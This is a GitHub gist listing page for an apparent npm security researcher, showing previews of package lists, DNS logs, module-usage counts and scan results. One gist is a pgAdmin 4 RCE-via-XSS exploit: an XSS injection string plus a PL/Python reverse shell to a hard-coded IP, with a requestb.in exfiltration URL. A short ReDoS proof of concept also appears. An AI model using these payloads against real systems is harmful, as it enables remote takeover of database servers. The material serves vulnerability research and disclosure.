Skip to content

Instantly share code, notes, and snippets.

View evilpacket's full-sized avatar
:octocat:

Adam Baldwin evilpacket

:octocat:
584 followers · 0 following
View GitHub Profile
@evilpacket
evilpacket / Download stuff over HTTP
Created August 8, 2017 15:14
"name","version"
"tarantul","0.8.86"
"tarantul","0.8.86"
"tarantul","0.8.84"
"tarantul","0.8.84"
"zookeeper-robskillington-3.4.3","3.4.3-1"
"zookeeper-robskillington-3.4.3","3.4.3-1"
"zookeeper-robskillington-3.4.3","3.4.3-1"
"youstream","0.1.2"
"zookeeper-rp","3.4.5-2"
@evilpacket
evilpacket / gist:ee2a94b812640ce749b5a936ca243235
Created August 8, 2017 15:04
module dns requests
5752dabccfc54c4ab82aea9626b7338e.monitor-eqatec.com
7af4ds.com2.z0.glb.qiniucdn.com
7rylsh.com1.z0.glb.clouddn.com
7xojg5.com1.z0.glb.clouddn.com
7xov2q.dl1.z0.glb.clouddn.com
acsc.cs.utexas.edu
admin.brightcove.com
airdownload.adobe.com
ajax.googleapis.com
akamai.bintray.com
@evilpacket
evilpacket / gist:e9f1ee472628e64ba358996106861e07
Created June 26, 2017 20:11
4633514 - path
3569836 - fs
1646083 - util
1477850 - assert
896187 - events
820144 - buffer
766000 - child_process
642174 - http
534563 - url
424279 - crypto
@evilpacket
evilpacket / cmd_exec.js
Created April 16, 2017 17:43
pgAdmin 4 (1.3 and below) RCE via XSS
// select '<img src="x" onerror=$.getScript("http://127.0.0.1:8000/cmd_exec.js") />';
// multi-query payload for RCE
var queries = ['create language plpythonu','CREATE OR REPLACE FUNCTION pwn() RETURNS text\\nLANGUAGE plpythonu\\nAS $$\\nimport socket,subprocess,os\\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\\ns.connect((\\"162.242.167.28\\",4445))\\nos.dup2(s.fileno(),0)\\nos.dup2(s.fileno(),1)\\nos.dup2(s.fileno(),2)\\na=subprocess.Popen([\\"/bin/sh\\",\\"-i\\"])\\nreturn \\"\\"\\n$$;\\n', 'select pwn()']
//queries = ['select current_user']
var exfil_url = 'http://requestb.in/16wy0z61'
@evilpacket
evilpacket / gist:55c16b0e3d9edc0fe1a114cc16c03e68
Created November 11, 2016 22:40
var fs = require('fs');
var JSONStream = require('jsonstream');
var infile = fs.createReadStream(__dirname + '/' + process.argv[2]);
var stream = JSONStream.parse(['rows', true, 'doc'])
infile.pipe(stream);
stream.on('data', function(data) {
@evilpacket
evilpacket / botbait results
Created November 9, 2016 15:38
{
"id": 7,
"created_at": "2015-06-23T21:04:11.995Z",
"process_versions": {
"http_parser": "1.0",
"node": "0.10.13",
"v8": "3.14.5.9",
"ares": "1.9.0-DEV",
"uv": "0.10.12",
"zlib": "1.2.3",
@evilpacket
evilpacket / Security placeholder packages 8-23-2016
Created August 23, 2016 23:55
2klic-api-engine
360-products
65710f05-a7c1-48d1-9ee5-acdfb7f70007
69d1a00e-7f6c-40a4-ab2e-70257bcd245c-es2015
AlertLogic
AutoFixture
Basic-Material-framework
Boilerpipe-Scraper
Coflux
CornerJob
@evilpacket
evilpacket / npm alternative url for module source
Created August 17, 2016 17:23
the counts for modules that have alternative url for the module (other than github or a regular package source)
220 blip.strongloop.com
135 packages.appdynamics.com
46 registry.npmjs.org
31 bitbucket.org
20 git.cobalt-engine.com
20 descinet.bbva.es
17 gitlab.hers.rs
11 appgyver-steroids.s3.amazonaws.com
@evilpacket
evilpacket / gist:6eeca8b06dc2f5c45549
Created October 25, 2015 04:56
Shitty ReDoS POC
var genstr = function (len, chr) {
var result = "";
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
r = /^([a-z0-9_\.\-\+])+\@(([a-z0-9\-])+\.)+([a-z0-9]{2,4})+$/
@evilpacket
evilpacket / gist:384ac23c2459014a254c
Created September 20, 2015 21:19
retirejs against npm Sept 19th 2015
Count by module / version
1006 YUI@3.3.0
850 YUI@3.4.1
823 jquery@1.8.3
797 jquery@1.7.1
796 jquery@1.7.2
750 YUI@3.0.0
244 jquery@1.8.1
240 jquery@1.8.2